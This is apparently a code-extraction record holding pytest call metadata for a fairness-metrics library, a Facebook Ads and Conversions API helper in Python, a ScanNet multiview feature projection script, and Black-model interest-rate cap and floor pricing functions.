'(3)'], {'metric': '"""true negative rate"""', 'metric_function': 'two'}), "(DATASET, GROUND_TRUTH, PREDICTIONS, 1, 3,\n metric='true negative rate', metric_function=two)\n", (6632, 6728), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((7025, 7050), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (7037, 7050), False, 'import pytest\n'), ((7090, 7225), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup', 'fums.performance_per_subgroup', (['DATASET', 'GROUND_TRUTH', 'PREDICTIONS', '(1)', '(3)'], {'metric': '"""true negative rate"""', 'metric_function': 'two', 'three': '(-6)'}), "(DATASET, GROUND_TRUTH, PREDICTIONS, 1, 3,\n metric='true negative rate', metric_function=two, three=-6)\n", (7119, 7225), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((7730, 7755), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (7742, 7755), False, 'import pytest\n'), ((7784, 7888), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed', 'fums.performance_per_subgroup_indexed', (['_INDICES_PER_BIN', 'GROUND_TRUTH', 'PREDICTIONS'], {'labels': '[0, 1, 2]'}), '(_INDICES_PER_BIN, GROUND_TRUTH,\n PREDICTIONS, labels=[0, 1, 2])\n', (7821, 7888), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((8007, 8054), 'pytest.approx', 'pytest.approx', (['[2 / 3, 3 / 5, 5 / 7]'], {'abs': '(0.001)'}), '([2 / 3, 3 / 5, 5 / 7], abs=0.001)\n', (8020, 8054), False, 'import pytest\n'), ((8083, 8108), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (8095, 8108), False, 'import pytest\n'), ((8137, 8270), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed', 'fums.performance_per_subgroup_indexed', (['_INDICES_PER_BIN', 'GROUND_TRUTH', 'PREDICTIONS'], {'labels': '[0, 1, 2]', 'metric': '"""true positive rate"""'}), "(_INDICES_PER_BIN, GROUND_TRUTH,\n PREDICTIONS, labels=[0, 1, 2], metric='true positive rate')\n", (8174, 8270), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((8437, 8476), 'pytest.approx', 'pytest.approx', (['[1, 1, 2 / 3]'], {'abs': '(0.001)'}), '([1, 1, 2 / 3], abs=0.001)\n', (8450, 8476), False, 'import pytest\n'), ((8519, 8544), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (8531, 8544), False, 'import pytest\n'), ((8573, 8719), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed', 'fums.performance_per_subgroup_indexed', (['_INDICES_PER_BIN', 'GROUND_TRUTH', 'PREDICTIONS'], {'labels': '[0, 1, 2]', 'metric': '"""true negative rate"""', 'strict': '(True)'}), "(_INDICES_PER_BIN, GROUND_TRUTH,\n PREDICTIONS, labels=[0, 1, 2], metric='true negative rate', strict=True)\n", (8610, 8719), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((8898, 8941), 'pytest.approx', 'pytest.approx', (['[0, 1 / 3, 3 / 4]'], {'abs': '(0.001)'}), '([0, 1 / 3, 3 / 4], abs=0.001)\n', (8911, 8941), False, 'import pytest\n'), ((9113, 9138), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (9125, 9138), False, 'import pytest\n'), ((9167, 9325), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed', 'fums.performance_per_subgroup_indexed', (['_INDICES_PER_BIN', 'GROUND_TRUTH', 'PREDICTIONS'], {'labels': '[0, 1, 2]', 'metric': '"""true negative rate"""', 'metric_function': 'one'}), "(_INDICES_PER_BIN, GROUND_TRUTH,\n PREDICTIONS, labels=[0, 1, 2], metric='true negative rate',\n metric_function=one)\n", (9204, 9325), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((9553, 9578), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (9565, 9578), False, 'import pytest\n'), ((9607, 9768), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed', 'fums.performance_per_subgroup_indexed', (['_INDICES_PER_BIN', 'GROUND_TRUTH', 'PREDICTIONS', '(3)'], {'labels': '[0, 1, 2]', 'metric': '"""true negative rate"""', 'metric_function': 'two'}), "(_INDICES_PER_BIN, GROUND_TRUTH,\n PREDICTIONS, 3, labels=[0, 1, 2], metric='true negative rate',\n metric_function=two)\n", (9644, 9768), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n'), ((10022, 10047), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (10034, 10047), False, 'import pytest\n'), ((10076, 10247), 'fatf.utils.metrics.subgroup_metrics.performance_per_subgroup_indexed', 'fums.performance_per_subgroup_indexed', (['_INDICES_PER_BIN', 'GROUND_TRUTH', 'PREDICTIONS', '(3)'], {'labels': '[0, 1, 2]', 'metric': '"""true negative rate"""', 'metric_function': 'two', 'three': '(-6)'}), "(_INDICES_PER_BIN, GROUND_TRUTH,\n PREDICTIONS, 3, labels=[0, 1, 2], metric='true negative rate',\n metric_function=two, three=-6)\n", (10113, 10247), True, 'import fatf.utils.metrics.subgroup_metrics as fums\n')] |
"""Facebook API"""
import os
import json
import logging
import pandas as pd
import time
import numpy as np
from datetime import datetime
from facebook_business.api import FacebookAdsApi
from facebook_business.adobjects.adaccount import AdAccount
from facebook_business.adobjects.serverside.event import Event
from facebook_business.adobjects.serverside.event_request import EventRequest
from facebook_business.adobjects.serverside.user_data import UserData
from facebook_business.adobjects.serverside.custom_data import CustomData
from facebook_business.exceptions import FacebookRequestError
def transform_campaign_budget(campaigns):
"""
Transforms get_campaigns response.
"""
out = []
for campaign in campaigns:
campaign_dict = dict(campaign)
if "lifetime_budget" in campaign_dict:
campaign_dict["budget"] = campaign_dict["lifetime_budget"]
campaign_dict["budget_type"] = "lifetime_budget"
del campaign_dict["lifetime_budget"]
elif "daily_budget" in campaign_dict:
campaign_dict["budget"] = campaign_dict["daily_budget"]
campaign_dict['budget_type'] = "daily_budget"
del campaign_dict["daily_budget"]
out.append(campaign_dict)
data = pd.DataFrame(out).rename(
columns={
"id": "campaign_id",
"name": "campaign_name"
}
)
return data
def build_predicted_revenue_events(df, event_name):
"""
Creates a list of Facebook Event objects which can be pushed to the Facebook Conversions API.
Also creates DataFrame for logging which can be used to stream insert to a BigQuery log table.
:param df: A DataFrame with the events to build Facebook events for
:type df: pd.DataFrame
Returns: A tuple with a list of Facebook events and a DataFrame for logs
rtype: (list of Event, pd.DataFrame)
"""
events = []
logs = []
for index, row in df.iterrows():
date = int(time.mktime(datetime.strptime(row['date'], '%Y%m%d').timetuple()))
user_data = UserData(
country_code=row['shop'],
fbp=row['facebook_browser_id']
)
custom_data = CustomData(
currency=row['currency'],
value=row['predicted_revenue']
)
event = Event(
event_name=event_name,
event_time=date,
user_data=user_data,
custom_data=custom_data,
data_processing_options=[]
)
events.append(event)
logs.append(
{
"facebook_browser_id": row['facebook_browser_id'],
"shop": row['shop'],
"date_source": row['date'],
"date_processed": datetime.today().strftime('%Y-%m-%d-%H:%M:%S'),
"predicted_revenue": row['predicted_revenue'],
"currency": row['currency']
}
)
df_logs = pd.DataFrame(logs)
return events, df_logs
def calculate_batches(total_events, batch_size):
"""
Calculate number of batches to split events into given a batch size and taking into account evenly divisible batches
:param total_events: The number of total events
:type total_events: int
:param batch_size: The max number of events in a batch
:type batch_size: int
Returns: The resulting number of batches
rtype: int
"""
batches = None
try:
batches = (total_events // batch_size)
batches = batches + 1 if total_events % batch_size != 0 else batches
except ZeroDivisionError:
logging.error('Batch Size cannot be 0')
raise
except TypeError:
logging.error('Total Events and Batch Size must be integers')
raise
return batches
def split_events_to_batches(events, batch_size=1000):
"""
Divides a DataFrame of events into batches of the specified batch size (defaults to 1000).
:param events: A DataFrame of Facebook Events to push to the conversions API
:type events: pd.DataFrame
:param batch_size: The max number of events in a batch
:type batch_size: int
Returns: A list of DataFrames
rtype: list of pd.DataFrame
"""
batched_df = []
try:
total_events = len(events.index)
except TypeError:
logging.warning("Events is null")
if total_events > 0:
logging.info('Batch limit set to %s', batch_size)
if total_events > batch_size:
batches = calculate_batches(total_events, batch_size)
batched_df = np.array_split(events, batches)
logging.info('Total %s events split into %s batches', total_events, batches)
else:
batched_df = [events]
logging.info('Total %s events only requires 1 batch', total_events)
else:
logging.warning('No events split into batches')
return batched_df
class FacebookExecutor:
""" Facebook FacebookExecutor.
Arguments:
"""
def __init__(self):
self.client = None
self.access_token = None
self.account = None
self.account_id = None
self.pixel_id = None
self.set_api_config()
def set_api_config(self):
"""
Loads access_token from FACEBOOK_APPLICATION_CREDENTIALS.
"""
try:
with open(os.environ["FACEBOOK_APPLICATION_CREDENTIALS"]) as facebook_cred:
data = json.load(facebook_cred)
self.access_token = data["access_token"]
except KeyError:
raise KeyError("FACEBOOK_APPLICATION_CREDENTIALS env variable needed")
self.set_client()
def set_client(self):
"""
Sets self.client using the access token.
"""
self.client = FacebookAdsApi.init(access_token=self.access_token)
def set_account(self, account_id):
""" Sets account object
"""
self.account_id = account_id
self.account = AdAccount('act_{}'.format(self.account_id))
logging.info("Initiated AdAccount object for account %s", self.account_id)
def set_pixel_id(self, pixel_id):
""" Sets the Pixel ID
"""
self.pixel_id = pixel_id
logging.info("Set the pixel_id as %s", self.pixel_id)
def get_campaign_insights(self, account_id, fields, start_date, end_date):
"""
Sets insights from the Facebook Insight API.
Parameters:
account_id: ID associated to the Facebook Account
start_date: The start date
end_date: The end date
fields: list of field to be fetched
start_date/end_date: defines the time range to get insights for (YYYY-mm-dd).
"""
self.set_account(account_id)
out = []
params = {
'effective_status': ['ACTIVE'],
'level': 'campaign',
'time_range': {
'since': start_date,
'until': end_date
}
}
logging.debug("Downloading insights for account %s", self.account_id)
logging.debug("fields: %s", fields)
logging.debug("params: %s", params)
campaign_insights = self.account.get_insights(
params=params,
fields=fields
)
for insight in campaign_insights:
out.append(dict(insight))
return out
def get_active_campaigns(self):
return self.account.get_campaigns(
fields=['account_id', 'name', 'daily_budget', 'lifetime_budget'],
params={
'effective_status': ["ACTIVE"],
'is_completed': False
}
)
def get_active_campaign_budgets(self, account_id):
"""
Fetches active campaign metadata from the Facebook API.
Returns a dataframe with the following fields:
- account_id
- campaign_id
- campaign_name
- budget_type (daily_budget or lifetime_budget)
- budget amount in account currency
"""
self.set_account(account_id)
campaigns = self.get_active_campaigns()
out = transform_campaign_budget(campaigns)
return out
def update_daily_budget(self, account_id, campaign_id, new_budget):
"""
Update the budget on the facebook API
"""
self.set_account(account_id)
campaigns = self.get_active_campaigns()
for campaign in campaigns:
if campaign.get_id() == campaign_id:
from pygyver.etl.toolkit import configure_logging
configure_logging()
logging.info(
"Loading new budget for campaign %s",
campaign_id
)
logging.info(
"Current daily_budget for campaign %s: %s",
campaign_id,
campaign['daily_budget']
)
campaign.api_update(
params={'daily_budget': round(new_budget*100)}
)
logging.info(
"New daily_budget for campaign %s: %s",
campaign_id,
new_budget
)
return campaigns
def push_conversions_api_events(self, events, test_event_code=None):
"""
Pushes a list of Events to the Facebook Conversions API.
:param events: A list of Facebook Events to push to the conversions API
:type events: list of Event
:param test_event_code: A test_event_code from Facebook Events Manager to mark these as test events
:type test_event_code: str
Returns: A dictionary with the parsed response from the Facebook API
rtype: dict[str, str]
"""
if len(events) > 1000:
logging.error("The maximum number of events that Facebook accepts in a single API call is 1,000. "
"Please use the split_events_to_batches() function to split the events into batches")
raise ValueError
event_request = EventRequest(
events=events,
pixel_id=self.pixel_id,
)
# Add the test_event_code if one is given
if test_event_code:
event_request.test_event_code = test_event_code
api_response = {}
try:
event_response = event_request.execute()
logging.info('%s events pushed to Facebook Conversions API', event_response.events_received)
api_response['status'] = 'API Success'
api_response['fb_trace_id'] = event_response.fbtrace_id
api_response['messages'] = '\n'.join(event_response.messages)
api_response['total_events'] = event_response.events_received
except FacebookRequestError as e:
logging.error('There was a Facebook Conversions API error:\n\t%s', e)
api_response['status'] = 'API Error'
api_response['fb_trace_id'] = e.body()['error']['fbtrace_id']
error_message = e.body()['error']['message']
error_message = ': '.join([error_message, e.body()['error']['error_user_msg']])
api_response['messages'] = error_message
api_response['total_events'] = None
return api_response
| [
"pandas.DataFrame",
"logging.error",
"json.load",
"logging.debug",
"facebook_business.adobjects.serverside.custom_data.CustomData",
"datetime.datetime.today",
"logging.warning",
"facebook_business.adobjects.serverside.user_data.UserData",
"facebook_business.api.FacebookAdsApi.init",
"logging.info"... | [((2945, 2963), 'pandas.DataFrame', 'pd.DataFrame', (['logs'], {}), '(logs)\n', (2957, 2963), True, 'import pandas as pd\n'), ((2071, 2137), 'facebook_business.adobjects.serverside.user_data.UserData', 'UserData', ([], {'country_code': "row['shop']", 'fbp': "row['facebook_browser_id']"}), "(country_code=row['shop'], fbp=row['facebook_browser_id'])\n", (2079, 2137), False, 'from facebook_business.adobjects.serverside.user_data import UserData\n'), ((2195, 2263), 'facebook_business.adobjects.serverside.custom_data.CustomData', 'CustomData', ([], {'currency': "row['currency']", 'value': "row['predicted_revenue']"}), "(currency=row['currency'], value=row['predicted_revenue'])\n", (2205, 2263), False, 'from facebook_business.adobjects.serverside.custom_data import CustomData\n'), ((2315, 2438), 'facebook_business.adobjects.serverside.event.Event', 'Event', ([], {'event_name': 'event_name', 'event_time': 'date', 'user_data': 'user_data', 'custom_data': 'custom_data', 'data_processing_options': '[]'}), '(event_name=event_name, event_time=date, user_data=user_data,\n custom_data=custom_data, data_processing_options=[])\n', (2320, 2438), False, 'from facebook_business.adobjects.serverside.event import Event\n'), ((4376, 4425), 'logging.info', 'logging.info', (['"""Batch limit set to %s"""', 'batch_size'], {}), "('Batch limit set to %s', batch_size)\n", (4388, 4425), False, 'import logging\n'), ((4822, 4869), 'logging.warning', 'logging.warning', (['"""No events split into batches"""'], {}), "('No events split into batches')\n", (4837, 4869), False, 'import logging\n'), ((5765, 5816), 'facebook_business.api.FacebookAdsApi.init', 'FacebookAdsApi.init', ([], {'access_token': 'self.access_token'}), '(access_token=self.access_token)\n', (5784, 5816), False, 'from facebook_business.api import FacebookAdsApi\n'), ((6013, 6087), 'logging.info', 'logging.info', (['"""Initiated AdAccount object for account %s"""', 'self.account_id'], {}), "('Initiated AdAccount object for account %s', self.account_id)\n", (6025, 6087), False, 'import logging\n'), ((6210, 6263), 'logging.info', 'logging.info', (['"""Set the pixel_id as %s"""', 'self.pixel_id'], {}), "('Set the pixel_id as %s', self.pixel_id)\n", (6222, 6263), False, 'import logging\n'), ((7000, 7069), 'logging.debug', 'logging.debug', (['"""Downloading insights for account %s"""', 'self.account_id'], {}), "('Downloading insights for account %s', self.account_id)\n", (7013, 7069), False, 'import logging\n'), ((7078, 7113), 'logging.debug', 'logging.debug', (['"""fields: %s"""', 'fields'], {}), "('fields: %s', fields)\n", (7091, 7113), False, 'import logging\n'), ((7122, 7157), 'logging.debug', 'logging.debug', (['"""params: %s"""', 'params'], {}), "('params: %s', params)\n", (7135, 7157), False, 'import logging\n'), ((10107, 10158), 'facebook_business.adobjects.serverside.event_request.EventRequest', 'EventRequest', ([], {'events': 'events', 'pixel_id': 'self.pixel_id'}), '(events=events, pixel_id=self.pixel_id)\n', (10119, 10158), False, 'from facebook_business.adobjects.serverside.event_request import EventRequest\n'), ((1267, 1284), 'pandas.DataFrame', 'pd.DataFrame', (['out'], {}), '(out)\n', (1279, 1284), True, 'import pandas as pd\n'), ((3596, 3635), 'logging.error', 'logging.error', (['"""Batch Size cannot be 0"""'], {}), "('Batch Size cannot be 0')\n", (3609, 3635), False, 'import logging\n'), ((3680, 3741), 'logging.error', 'logging.error', (['"""Total Events and Batch Size must be integers"""'], {}), "('Total Events and Batch Size must be integers')\n", (3693, 3741), False, 'import logging\n'), ((4308, 4341), 'logging.warning', 'logging.warning', (['"""Events is null"""'], {}), "('Events is null')\n", (4323, 4341), False, 'import logging\n'), ((4555, 4586), 'numpy.array_split', 'np.array_split', (['events', 'batches'], {}), '(events, batches)\n', (4569, 4586), True, 'import numpy as np\n'), ((4599, 4675), 'logging.info', 'logging.info', (['"""Total %s events split into %s batches"""', 'total_events', 'batches'], {}), "('Total %s events split into %s batches', total_events, batches)\n", (4611, 4675), False, 'import logging\n'), ((4736, 4803), 'logging.info', 'logging.info', (['"""Total %s events only requires 1 batch"""', 'total_events'], {}), "('Total %s events only requires 1 batch', total_events)\n", (4748, 4803), False, 'import logging\n'), ((9842, 10033), 'logging.error', 'logging.error', (['"""The maximum number of events that Facebook accepts in a single API call is 1,000. Please use the split_events_to_batches() function to split the events into batches"""'], {}), "(\n 'The maximum number of events that Facebook accepts in a single API call is 1,000. Please use the split_events_to_batches() function to split the events into batches'\n )\n", (9855, 10033), False, 'import logging\n'), ((10439, 10536), 'logging.info', 'logging.info', (['"""%s events pushed to Facebook Conversions API"""', 'event_response.events_received'], {}), "('%s events pushed to Facebook Conversions API', event_response\n .events_received)\n", (10451, 10536), False, 'import logging\n'), ((5427, 5451), 'json.load', 'json.load', (['facebook_cred'], {}), '(facebook_cred)\n', (5436, 5451), False, 'import json\n'), ((8600, 8619), 'pygyver.etl.toolkit.configure_logging', 'configure_logging', ([], {}), '()\n', (8617, 8619), False, 'from pygyver.etl.toolkit import configure_logging\n'), ((8636, 8699), 'logging.info', 'logging.info', (['"""Loading new budget for campaign %s"""', 'campaign_id'], {}), "('Loading new budget for campaign %s', campaign_id)\n", (8648, 8699), False, 'import logging\n'), ((8774, 8873), 'logging.info', 'logging.info', (['"""Current daily_budget for campaign %s: %s"""', 'campaign_id', "campaign['daily_budget']"], {}), "('Current daily_budget for campaign %s: %s', campaign_id,\n campaign['daily_budget'])\n", (8786, 8873), False, 'import logging\n'), ((9086, 9163), 'logging.info', 'logging.info', (['"""New daily_budget for campaign %s: %s"""', 'campaign_id', 'new_budget'], {}), "('New daily_budget for campaign %s: %s', campaign_id, new_budget)\n", (9098, 9163), False, 'import logging\n'), ((10854, 10925), 'logging.error', 'logging.error', (['"""There was a Facebook Conversions API error:\n\t%s"""', 'e'], {}), '("""There was a Facebook Conversions API error:\n\t%s""", e)\n', (10867, 10925), False, 'import logging\n'), ((1996, 2036), 'datetime.datetime.strptime', 'datetime.strptime', (["row['date']", '"""%Y%m%d"""'], {}), "(row['date'], '%Y%m%d')\n", (2013, 2036), False, 'from datetime import datetime\n'), ((2752, 2768), 'datetime.datetime.today', 'datetime.today', ([], {}), '()\n', (2766, 2768), False, 'from datetime import datetime\n')] |
import os
import sys
import h5py
import torch
import torch.nn as nn
import argparse
import numpy as np
from tqdm import tqdm
from plyfile import PlyData, PlyElement
import math
from imageio import imread
from PIL import Image
import torchvision.transforms as transforms
sys.path.append(os.path.join(os.getcwd())) # HACK add the root folder
from lib.config import CONF
from lib.projection import ProjectionHelper
SCANNET_LIST = CONF.SCANNETV2_LIST
SCANNET_DATA = CONF.PREP_SCANS
SCANNET_FRAME_ROOT = CONF.SCANNET_FRAMES
SCANNET_FRAME_PATH = os.path.join(SCANNET_FRAME_ROOT, "{}") # name of the file
ENET_FEATURE_PATH = CONF.ENET_FEATURES_PATH
ENET_FEATURE_DATABASE = CONF.MULTIVIEW
# projection
INTRINSICS = [[37.01983, 0, 20, 0],[0, 38.52470, 15.5, 0],[0, 0, 1, 0],[0, 0, 0, 1]]
PROJECTOR = ProjectionHelper(INTRINSICS, 0.1, 4.0, [41, 32], 0.05)
def get_scene_list():
with open(SCANNET_LIST, 'r') as f:
return sorted(list(set(f.read().splitlines())))
def to_tensor(arr):
return torch.Tensor(arr).cuda()
def resize_crop_image(image, new_image_dims):
image_dims = [image.shape[1], image.shape[0]]
if image_dims == new_image_dims:
return image
resize_width = int(math.floor(new_image_dims[1] * float(image_dims[0]) / float(image_dims[1])))
image = transforms.Resize([new_image_dims[1], resize_width], interpolation=Image.NEAREST)(Image.fromarray(image))
image = transforms.CenterCrop([new_image_dims[1], new_image_dims[0]])(image)
image = np.array(image)
return image
def load_image(file, image_dims):
image = imread(file)
# preprocess
image = resize_crop_image(image, image_dims)
if len(image.shape) == 3: # color image
image = np.transpose(image, [2, 0, 1]) # move feature to front
image = transforms.Normalize(mean=[0.496342, 0.466664, 0.440796], std=[0.277856, 0.28623, 0.291129])(torch.Tensor(image.astype(np.float32) / 255.0))
elif len(image.shape) == 2: # label image
# image = np.expand_dims(image, 0)
pass
else:
raise
return image
def load_pose(filename):
lines = open(filename).read().splitlines()
assert len(lines) == 4
lines = [[x[0],x[1],x[2],x[3]] for x in (x.split(" ") for x in lines)]
return np.asarray(lines).astype(np.float32)
def load_depth(file, image_dims):
depth_image = imread(file)
# preprocess
depth_image = resize_crop_image(depth_image, image_dims)
depth_image = depth_image.astype(np.float32) / 1000.0
return depth_image
def get_scene_data(scene_list):
scene_data = {}
for scene_id in scene_list:
scene_data[scene_id] = np.load(os.path.join(SCANNET_DATA, scene_id)+".npy")[:, :3]
return scene_data
def compute_projection(points, depth, camera_to_world):
"""
:param points: tensor containing all points of the point cloud (num_points, 3)
:param depth: depth map (size: proj_image)
:param camera_to_world: camera pose (4, 4)
:return indices_3d (array with point indices that correspond to a pixel),
:return indices_2d (array with pixel indices that correspond to a point)
note:
the first digit of indices represents the number of relevant points
the rest digits are for the projection mapping
"""
num_points = points.shape[0]
num_frames = depth.shape[0]
indices_3ds = torch.zeros(num_frames, num_points + 1).long().cuda()
indices_2ds = torch.zeros(num_frames, num_points + 1).long().cuda()
for i in range(num_frames):
indices = PROJECTOR.compute_projection(to_tensor(points), to_tensor(depth[i]), to_tensor(camera_to_world[i]))
if indices:
indices_3ds[i] = indices[0].long()
indices_2ds[i] = indices[1].long()
return indices_3ds, indices_2ds
if __name__ == "__main__":
scene_list = get_scene_list()
scene_data = get_scene_data(scene_list)
with h5py.File(ENET_FEATURE_DATABASE, "w", libver="latest") as database:
print("projecting multiview features to point cloud...")
for scene_id in tqdm(scene_list):
scene = scene_data[scene_id]
# load frames
frame_list = list(map(lambda x: x.split(".")[0], os.listdir(SCANNET_FRAME_ROOT.format(scene_id, "color"))))
scene_images = np.zeros((len(frame_list), 3, 256, 328))
scene_depths = np.zeros((len(frame_list), 32, 41))
scene_poses = np.zeros((len(frame_list), 4, 4))
for i, frame_id in enumerate(frame_list):
scene_images[i] = load_image(SCANNET_FRAME_PATH.format(scene_id, "color", "{}.jpg".format(frame_id)), [328, 256])
scene_depths[i] = load_depth(SCANNET_FRAME_PATH.format(scene_id, "depth", "{}.png".format(frame_id)), [41, 32])
scene_poses[i] = load_pose(SCANNET_FRAME_PATH.format(scene_id, "pose", "{}.txt".format(frame_id)))
# compute projections for each chunk
projection_3d, projection_2d = compute_projection(scene, scene_depths, scene_poses)
_, inds = torch.sort(projection_3d[:, 0], descending=True)
projection_3d, projection_2d = projection_3d[inds], projection_2d[inds]
# compute valid projections
projections = []
for i in range(projection_3d.shape[0]):
num_valid = projection_3d[i, 0]
if num_valid == 0:
continue
projections.append((frame_list[inds[i].long().item()], projection_3d[i], projection_2d[i]))
# project
point_features = to_tensor(scene).new(scene.shape[0], 128).fill_(0)
for i, projection in enumerate(projections):
frame_id = projection[0]
projection_3d = projection[1]
projection_2d = projection[2]
feat = to_tensor(np.load(ENET_FEATURE_PATH.format(scene_id, frame_id)))
proj_feat = PROJECTOR.project(feat, projection_3d, projection_2d, scene.shape[0]).transpose(1, 0)
if i == 0:
point_features = proj_feat
else:
mask = ((point_features == 0).sum(1) == 128).nonzero().squeeze(1)
point_features[mask] = proj_feat[mask]
# save
database.create_dataset(scene_id, data=point_features.cpu().numpy())
print("done!")
| [
"h5py.File",
"tqdm.tqdm",
"os.getcwd",
"imageio.imread",
"numpy.asarray",
"numpy.transpose",
"torch.zeros",
"torch.Tensor",
"numpy.array",
"PIL.Image.fromarray",
"torchvision.transforms.CenterCrop",
"torchvision.transforms.Normalize",
"os.path.join",
"torch.sort",
"lib.projection.Project... | [((542, 580), 'os.path.join', 'os.path.join', (['SCANNET_FRAME_ROOT', '"""{}"""'], {}), "(SCANNET_FRAME_ROOT, '{}')\n", (554, 580), False, 'import os\n'), ((795, 849), 'lib.projection.ProjectionHelper', 'ProjectionHelper', (['INTRINSICS', '(0.1)', '(4.0)', '[41, 32]', '(0.05)'], {}), '(INTRINSICS, 0.1, 4.0, [41, 32], 0.05)\n', (811, 849), False, 'from lib.projection import ProjectionHelper\n'), ((1491, 1506), 'numpy.array', 'np.array', (['image'], {}), '(image)\n', (1499, 1506), True, 'import numpy as np\n'), ((1576, 1588), 'imageio.imread', 'imread', (['file'], {}), '(file)\n', (1582, 1588), False, 'from imageio import imread\n'), ((2358, 2370), 'imageio.imread', 'imread', (['file'], {}), '(file)\n', (2364, 2370), False, 'from imageio import imread\n'), ((300, 311), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (309, 311), False, 'import os\n'), ((1292, 1378), 'torchvision.transforms.Resize', 'transforms.Resize', (['[new_image_dims[1], resize_width]'], {'interpolation': 'Image.NEAREST'}), '([new_image_dims[1], resize_width], interpolation=Image.\n NEAREST)\n', (1309, 1378), True, 'import torchvision.transforms as transforms\n'), ((1374, 1396), 'PIL.Image.fromarray', 'Image.fromarray', (['image'], {}), '(image)\n', (1389, 1396), False, 'from PIL import Image\n'), ((1410, 1471), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', (['[new_image_dims[1], new_image_dims[0]]'], {}), '([new_image_dims[1], new_image_dims[0]])\n', (1431, 1471), True, 'import torchvision.transforms as transforms\n'), ((1716, 1746), 'numpy.transpose', 'np.transpose', (['image', '[2, 0, 1]'], {}), '(image, [2, 0, 1])\n', (1728, 1746), True, 'import numpy as np\n'), ((3956, 4010), 'h5py.File', 'h5py.File', (['ENET_FEATURE_DATABASE', '"""w"""'], {'libver': '"""latest"""'}), "(ENET_FEATURE_DATABASE, 'w', libver='latest')\n", (3965, 4010), False, 'import h5py\n'), ((4113, 4129), 'tqdm.tqdm', 'tqdm', (['scene_list'], {}), '(scene_list)\n', (4117, 4129), False, 'from tqdm import tqdm\n'), ((1000, 1017), 'torch.Tensor', 'torch.Tensor', (['arr'], {}), '(arr)\n', (1012, 1017), False, 'import torch\n'), ((1788, 1885), 'torchvision.transforms.Normalize', 'transforms.Normalize', ([], {'mean': '[0.496342, 0.466664, 0.440796]', 'std': '[0.277856, 0.28623, 0.291129]'}), '(mean=[0.496342, 0.466664, 0.440796], std=[0.277856, \n 0.28623, 0.291129])\n', (1808, 1885), True, 'import torchvision.transforms as transforms\n'), ((2268, 2285), 'numpy.asarray', 'np.asarray', (['lines'], {}), '(lines)\n', (2278, 2285), True, 'import numpy as np\n'), ((5104, 5152), 'torch.sort', 'torch.sort', (['projection_3d[:, 0]'], {'descending': '(True)'}), '(projection_3d[:, 0], descending=True)\n', (5114, 5152), False, 'import torch\n'), ((2655, 2691), 'os.path.join', 'os.path.join', (['SCANNET_DATA', 'scene_id'], {}), '(SCANNET_DATA, scene_id)\n', (2667, 2691), False, 'import os\n'), ((3405, 3444), 'torch.zeros', 'torch.zeros', (['num_frames', '(num_points + 1)'], {}), '(num_frames, num_points + 1)\n', (3416, 3444), False, 'import torch\n'), ((3477, 3516), 'torch.zeros', 'torch.zeros', (['num_frames', '(num_points + 1)'], {}), '(num_frames, num_points + 1)\n', (3488, 3516), False, 'import torch\n')] |
import numpy as np
from scipy.stats import norm
from dcf import dcf
def blacklet(K, F, vol, omega=1):
log_ratio = np.log(F / K)
d1 = (log_ratio + 0.5 * vol**2) / vol
d2 = (log_ratio - 0.5 * vol**2) / vol
return F * omega * norm.cdf(omega * d1) - K * omega * norm.cdf(omega * d2)
def caplet_black(bond, forward, S, T, K, sigma, method='Act360'):
dcf_factor = dcf(S, T, method=method)
vol = sigma * np.sqrt(S)
return bond * dcf_factor * blacklet(K, S, forward, vol, omega=1)
def cap_black(bonds, forwards, times, K, sigma, method='Act360'):
if len(times) == 2:
return caplet_black(bonds, forwards, times[0], times[1], K, sigma, method=method)
else:
sum = 0
for i in range(len(times) - 1):
bond = bonds.pop()
forward = forwards.pop()
S, T = bond[i], bond[i]
sum += caplet_black(bond, forward, S, T, K, sigma, method=method)
return sum
def floorlet_black(bond, forward, S, T, K, sigma, method='Act360'):
dcf_factor = dcf(S, T, method=method)
vol = sigma * np.sqrt(S)
return bond * dcf_factor * blacklet(K, S, forward, vol, omega=-1)
def floor_black(bonds, forwards, times, K, sigma, method='Act360'):
if len(times) == 2:
return floorlet_black(bonds, forwards, times[0], times[1], K, sigma, method=method)
else:
sum = 0
for i in range(len(times) - 1):
bond = bonds.pop()
forward = forwards.pop()
S, T = bond[i], bond[i]
sum += flooret_black(bond, forward, S, T, K, sigma, method=method)
return sum
| [
"scipy.stats.norm.cdf",
"dcf.dcf",
"numpy.log",
"numpy.sqrt"
